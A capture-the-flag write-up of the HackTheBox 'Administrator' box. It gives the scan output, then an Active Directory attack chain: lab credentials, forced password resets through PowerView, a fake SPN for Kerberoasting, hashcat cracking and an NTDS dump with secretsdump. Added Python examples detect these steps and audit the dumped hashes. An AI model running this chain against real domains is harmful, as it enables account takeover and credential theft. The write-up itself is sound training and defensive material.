Administrator

Operating system | Difficulty | Release date | Creator |
---|---|---|---|
Windows | Medium | 09 November 2024 | nirza |
Credentials
Username | Password |
---|---|
Olivia | ichliebedich |
Port scan
nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.11.42
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-13 03:07 -03
Initiating SYN Stealth Scan at 03:07
Scanning 10.10.11.42 [65535 ports]
Discovered open port 445/tcp on 10.10.11.42
Discovered open port 53/tcp on 10.10.11.42
Discovered open port 135/tcp on 10.10.11.42
Discovered open port 21/tcp on 10.10.11.42
Discovered open port 139/tcp on 10.10.11.42
Discovered open port 9389/tcp on 10.10.11.42
Discovered open port 49667/tcp on 10.10.11.42
Discovered open port 54428/tcp on 10.10.11.42
Discovered open port 49665/tcp on 10.10.11.42
Discovered open port 61964/tcp on 10.10.11.42
Discovered open port 5985/tcp on 10.10.11.42
Discovered open port 61937/tcp on 10.10.11.42
Discovered open port 389/tcp on 10.10.11.42
Discovered open port 49664/tcp on 10.10.11.42
Discovered open port 47001/tcp on 10.10.11.42
Discovered open port 61953/tcp on 10.10.11.42
Discovered open port 3269/tcp on 10.10.11.42
Discovered open port 636/tcp on 10.10.11.42
Discovered open port 49669/tcp on 10.10.11.42
Discovered open port 61941/tcp on 10.10.11.42
Discovered open port 593/tcp on 10.10.11.42
Discovered open port 49666/tcp on 10.10.11.42
Discovered open port 464/tcp on 10.10.11.42
Discovered open port 88/tcp on 10.10.11.42
Discovered open port 3268/tcp on 10.10.11.42
Completed SYN Stealth Scan at 03:08, 20.24s elapsed (65535 total ports)
Nmap scan report for 10.10.11.42
Host is up, received user-set (0.20s latency).
Scanned at 2025-04-13 03:07:47 -03 for 20s
Not shown: 64500 closed tcp ports (reset), 1010 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 127
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
54428/tcp open unknown syn-ack ttl 127
61937/tcp open unknown syn-ack ttl 127
61941/tcp open unknown syn-ack ttl 127
61953/tcp open unknown syn-ack ttl 127
61964/tcp open unknown syn-ack ttl 127
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 20.32 seconds
Raw packets sent: 99325 (4.370MB) | Rcvd: 65323 (2.613MB)
Service and version enumeration
nmap -sCV -p21,53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,54428,61937,61941,61953,61964 -oN servicesScan 10.10.11.42
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-13 03:08 -03
Nmap scan report for 10.10.11.42 (10.10.11.42)
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-13 06:08:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
54428/tcp open msrpc Microsoft Windows RPC
61937/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
61941/tcp open msrpc Microsoft Windows RPC
61953/tcp open msrpc Microsoft Windows RPC
61964/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-04-13T06:09:22
|_ start_date: N/A
|_clock-skew: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.28 seconds
Initial exploitation
echo '10.10.11.42 administrator.htb' >> /etc/hosts
User enumeration.
We enumerate over LDAP using ldapdomaindump.
ldapdomaindump -u 'administrator.htb\olivia' -p 'ichliebedich' 10.10.11.42
We enumerate with BloodHound.
bloodhound-python -u 'olivia' -p 'ichliebedich' -d administrator.htb -ns 10.10.11.42 --zip -c All
We change the password of user michael.
We upload PowerView to the target machine.
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity michael -AccountPassword $UserPassword
We enumerate with BloodHound again.
The user michael can change the password of user Benjamin.
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity benjamin -AccountPassword $UserPassword
FTP (21)
emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
We log in to the DC via WinRM.
To abuse this GenericWrite permission, we can assign a fake SPN to the ethan account and then obtain its TGS and crack it.
Import-module .\PowerView.ps1
Set-DomainObject -Identity <USER> -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
hashcat -m 13100 ethan_hash.txt /usr/share/wordlists/rockyou.txt
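As an added example (not part of this writeup), here is a small detection pass in Python over the Windows Security events that the password-reset and fake-SPN steps above generate on the domain controller. The event records are constructed, the `svc_helpdesk` allow-list is assumed, and 5136 events only appear when Directory Service Changes auditing is enabled and a SACL exists on the user objects.

```python
# Added example (not from the original writeup): a detection pass over Windows Security
# events for the ACL-abuse chain above. 4724 = password reset by a *different* account
# (ForceChangePassword); 5136 = servicePrincipalName added to a *user* object
# (GenericWrite -> fake SPN); 4769 = RC4 (0x17) TGS requested for a user's SPN (the roast).
# Records are constructed and reduced to the fields the rules read; HELPDESK is an
# assumed allow-list of accounts that legitimately reset passwords or edit SPNs.
HELPDESK = {"svc_helpdesk"}
VALUE_ADDED = "%%14674"   # 5136 OperationType code for "Value Added"

def find_acl_abuse(events):
    """Return [(rule, detail), ...] for every record matching one of the rules."""
    findings = []
    for e in events:
        eid = e["EventID"]
        if eid == 4724:
            actor, target = e["SubjectUserName"].lower(), e["TargetUserName"].lower()
            if actor != target and actor not in HELPDESK:
                findings.append(("forced_password_reset", f"{actor} reset the password of {target}"))
        elif eid == 5136:
            if (e["ObjectClass"] == "user"
                    and e["AttributeLDAPDisplayName"].lower() == "serviceprincipalname"
                    and e["OperationType"] == VALUE_ADDED
                    and e["SubjectUserName"].lower() not in HELPDESK):
                findings.append(("spn_added_to_user",
                                 f"{e['SubjectUserName']} added SPN {e['AttributeValue']} to {e['ObjectDN']}"))
        elif eid == 4769:
            # Computer accounts end in '$'; an RC4 TGS for a user SPN is the Kerberoast signature.
            svc = e["ServiceName"]
            if not svc.endswith("$") and e["TicketEncryptionType"] == "0x17":
                findings.append(("rc4_tgs_for_user", f"{e['TargetUserName']} requested an RC4 TGS for {svc}"))
    return findings

# Constructed sample: the chain from this box plus two benign records that must not fire.
SAMPLE_EVENTS = [
    {"EventID": 4724, "SubjectUserName": "olivia", "TargetUserName": "michael"},
    {"EventID": 4724, "SubjectUserName": "svc_helpdesk", "TargetUserName": "emma"},
    {"EventID": 5136, "SubjectUserName": "emily", "ObjectClass": "user",
     "ObjectDN": "CN=ethan,CN=Users,DC=administrator,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "nonexistent/BLAHBLAH", "OperationType": "%%14674"},
    {"EventID": 4769, "TargetUserName": "emily@ADMINISTRATOR.HTB",
     "ServiceName": "ethan", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TargetUserName": "emily@ADMINISTRATOR.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12"},
]
```

Running `find_acl_abuse(SAMPLE_EVENTS)` yields exactly the three attacker steps, in order, and nothing for the helpdesk reset or the AES ticket to `DC$`.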
Privilege escalation to root/SYSTEM
ethan:limpbizkit
┌──(root㉿kali)-[/home/kali/htb/Administrator/content]
└─# impacket-secretsdump administrator.htb/ethan:limpbizkit@10.10.11.42
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up...
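As an added audit example (not from the writeup), the following Python parses the `domain\uid:rid:lmhash:nthash:::` lines that secretsdump prints and flags accounts sharing one NT hash (the same password, which is what happens when two accounts are reset to a single value during the chain above), accounts with an empty password, and accounts that still store a real LM hash. The dump lines and all hash values except the two well-known empty-password constants are constructed.

```python
# Added example (not from the original writeup): audit a secretsdump-style NTDS dump
# in the "domain\uid:rid:lmhash:nthash:::" format for reused passwords, empty
# passwords and lingering LM hashes. SAMPLE_DUMP below is constructed; only the
# two EMPTY_* constants are the real, publicly known hashes of the empty string.
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "" (LM storage disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

def parse_dump(text):
    """Yield (account, rid, lmhash, nthash) for each credential line; skip status lines."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        # Credential lines have exactly 7 colon-separated fields: user:rid:lm:nt:::
        if len(parts) != 7 or not parts[1].isdigit() or len(parts[3]) != 32:
            continue
        yield parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()

def audit_dump(text):
    """Return {'reused': {nthash: [accounts]}, 'empty': [accounts], 'lm_present': [accounts]}."""
    by_nt = defaultdict(list)
    empty, lm_present = [], []
    for acct, _rid, lm, nt in parse_dump(text):
        by_nt[nt].append(acct)
        if nt == EMPTY_NT:
            empty.append(acct)
        if lm != EMPTY_LM:
            lm_present.append(acct)   # a real LM hash means LM storage is still enabled
    reused = {nt: accts for nt, accts in by_nt.items() if len(accts) > 1}
    return {"reused": reused, "empty": empty, "lm_present": lm_present}

# Constructed dump: michael and benjamin share a hash (both reset to one password),
# Guest has an empty password, svc_legacy still carries an LM hash.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
administrator.htb\\michael:1109:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
administrator.htb\\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
administrator.htb\\svc_legacy:1200:0123456789abcdef0123456789abcdef:33333333333333333333333333333333:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:44444444444444444444444444444444:::
[*] Cleaning up...
"""
```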